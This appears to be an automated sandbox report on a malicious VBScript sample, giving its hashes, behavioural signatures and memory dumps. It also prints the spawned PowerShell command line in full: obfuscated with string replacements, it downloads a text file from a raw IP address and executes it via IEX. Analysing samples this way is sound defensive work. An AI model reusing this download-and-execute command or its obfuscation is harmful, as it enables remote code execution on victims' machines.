Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
10-02-2022 18:50
Static task
static1
Behavioral task
behavioral1
Sample
ISSVULHWACHLPTGHUNSEZBHITDJCYSVUKKGQHLSCPYQYLHSHFDDDKXHBOOLHYAHOOCFW.vbs
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
ISSVULHWACHLPTGHUNSEZBHITDJCYSVUKKGQHLSCPYQYLHSHFDDDKXHBOOLHYAHOOCFW.vbs
Resource
win10v2004-en-20220112
General
-
Target
ISSVULHWACHLPTGHUNSEZBHITDJCYSVUKKGQHLSCPYQYLHSHFDDDKXHBOOLHYAHOOCFW.vbs
-
Size
10KB
-
MD5
d0be9b310cf06899b65ff3db8c6b20a7
-
SHA1
ce3d7dabd54f6c8c995cde52cf4be2bc30653965
-
SHA256
030fb292c8fedebe01ff5929c737df216dfde678e14fbf47ac70c7a21f630cb7
-
SHA512
11b04987b28603549e641907c7a2d2af58303df5628c669bbbb37ec6079767675aabe921e59e67dfea04a629c6afc8b9622dd7e395e261bab7cdb855153f204e
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1796 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 764 wrote to memory of 1796 764 WScript.exe powershell.exe PID 764 wrote to memory of 1796 764 WScript.exe powershell.exe PID 764 wrote to memory of 1796 764 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ISSVULHWACHLPTGHUNSEZBHITDJCYSVUKKGQHLSCPYQYLHSHFDDDKXHBOOLHYAHOOCFW.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HUEFUTBTCTLCFKDGFALECUN = '[*+5&/!3<</(%3<$$&<1@#-y*+5&/!3<</(%3<$$&<1@#-t/%&1&+&7=!@8-0(0-+8%$\[/&]9}][1_+@%-&<&#^--%.IO.*+5&/!3<</(%3<$$&<1@#-t)*({3!_=3]@{-+1\}@%{88/%&1&+&7=!@8-0(0-+8%$\4}84}8705\01[/#-(6&19%[/&]9}][1_+@%-&<&#^--%)*({3!_=3]@{-+1\}@%{88/%&1&+&7=!@8-0(0-+8%$\4}84}8705\01[/#-(6&19%d/%&1&+&7=!@8-0(0-+8%$\)*({3!_=3]@{-+1\}@%{88]'.RePlace('*+5&/!3<</(%3<$$&<1@#-','S').RePlace('/%&1&+&7=!@8-0(0-+8%$\','E').RePlace(')*({3!_=3]@{-+1\}@%{88','R').RePlace('4}84}8705\01[/#-(6&19%','A').RePlace('[/&]9}][1_+@%-&<&#^--%','M');$HHPCXNLYCJNJNANYSIXGBXB = ($HUEFUTBTCTLCFKDGFALECUN -Join '')|&('I'+'EX');$HBSWWCHKJPHCIHYLPBADIVC = '[%=}3&3{997<)<9(\/#$9]_y%=}3&3{997<)<9(\/#$9]_#[{9@(%3!%*}#!(]]5)5+%!^%)7)_4&^+#%{370{3-#%m.N!^%)7)_4&^+#%{370{3-#%#[{9@(%3!%*}#!(]]5)5+%.W!^%)7)_4&^+#%{370{3-#%bR!^%)7)_4&^+#%{370{3-#%qu!^%)7)_4&^+#%{370{3-#%%=}3&3{997<)<9(\/#$9]_#[{9@(%3!%*}#!(]]5)5+%]'.RePlace('%=}3&3{997<)<9(\/#$9]_','S').RePlace('!^%)7)_4&^+#%{370{3-#%','E').RePlace('#[{9@(%3!%*}#!(]]5)5+%','T');$HRKBGLQEIIOTGKRAVGDLNFB = ($HBSWWCHKJPHCIHYLPBADIVC -Join '')|&('I'+'EX');$HEKLNIBCXUJQWGFRURKPEYH = '}=5(@3]#3)+286%^()-%7%r\9-9[^\2<62^/3@+]3!){}a^[0__=$7}#(@{][37@^2_&\9-9[^\2<62^/3@+]3!){}'.RePlace('}=5(@3]#3)+286%^()-%7%','C').RePlace('\9-9[^\2<62^/3@+]3!){}','E').RePlace('^[0__=$7}#(@{][37@^2_&','T');$HEBZUFQTNVBUTPKTLSTLJWS = '<=7#5]=_4*+3-]/7}6)-!)\(9%[{[/5=6/[(%9(&%592tR\(9%[{[/5=6/[(%9(&%592++4/41*0$\7@})4_2\{5$/Pon++4/41*0$\7@})4_2\{5$/\(9%[{[/5=6/[(%9(&%592'.RePlace('<=7#5]=_4*+3-]/7}6)-!)','G').RePlace('\(9%[{[/5=6/[(%9(&%592','E').RePlace('++4/41*0$\7@})4_2\{5$/','S');$HHPHRZIHNFHAGPKYQIXDUFE = 'G-^{}6\%&!4)-{0/-92=!)1t1/=&068/-*)_2^(\@_)-}7-^{}6\%&!4)-{0/-92=!)1\{1@=&(406!]](!]+[#[08Pon\{1@=&(406!]](!]+[#[08-^{}6\%&!4)-{0/-92=!)1\{1@=&(406!]](!]+[#[08t1/=&068/-*)_2^(\@_)-}7-^{}6\%&!4)-{0/-92=!)1am'.RePlace('\{1@=&(406!]](!]+[#[08','S').RePlace('-^{}6\%&!4)-{0/-92=!)1','E').RePlace('1/=&068/-*)_2^(\@_)-}7','R');$HXLYDESAYDAKLLLAJUVKBOS = '85{2//*@5<)-^[3_)00#@2449$6@_2+[6{+*=970##$_a101-}+2!%$[72+-&{7+39{To449$6@_2+[6{+*=970##$_n101-}+2!%$[72+-&{7+39{'.RePlace('85{2//*@5<)-^[3_)00#@2','R').RePlace('449$6@_2+[6{+*=970##$_','E').RePlace('101-}+2!%$[72+-&{7+39{','D');&('I'+'EX')($HHPCXNLYCJNJNANYSIXGBXB::new($HRKBGLQEIIOTGKRAVGDLNFB::$HEKLNIBCXUJQWGFRURKPEYH('HttP://54.235.58.2/3/Y7839.txt').$HEBZUFQTNVBUTPKTLSTLJWS().$HHPHRZIHNFHAGPKYQIXDUFE()).$HXLYDESAYDAKLLLAJUVKBOS())2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/764-54-0x000007FEFB711000-0x000007FEFB713000-memory.dmpFilesize
8KB
-
memory/1796-56-0x000007FEF2830000-0x000007FEF338D000-memory.dmpFilesize
11.4MB
-
memory/1796-57-0x000007FEF4F5E000-0x000007FEF4F5F000-memory.dmpFilesize
4KB
-
memory/1796-58-0x00000000025A0000-0x00000000025A2000-memory.dmpFilesize
8KB
-
memory/1796-60-0x00000000025A4000-0x00000000025A7000-memory.dmpFilesize
12KB
-
memory/1796-59-0x00000000025A2000-0x00000000025A4000-memory.dmpFilesize
8KB
-
memory/1796-61-0x00000000025AB000-0x00000000025CA000-memory.dmpFilesize
124KB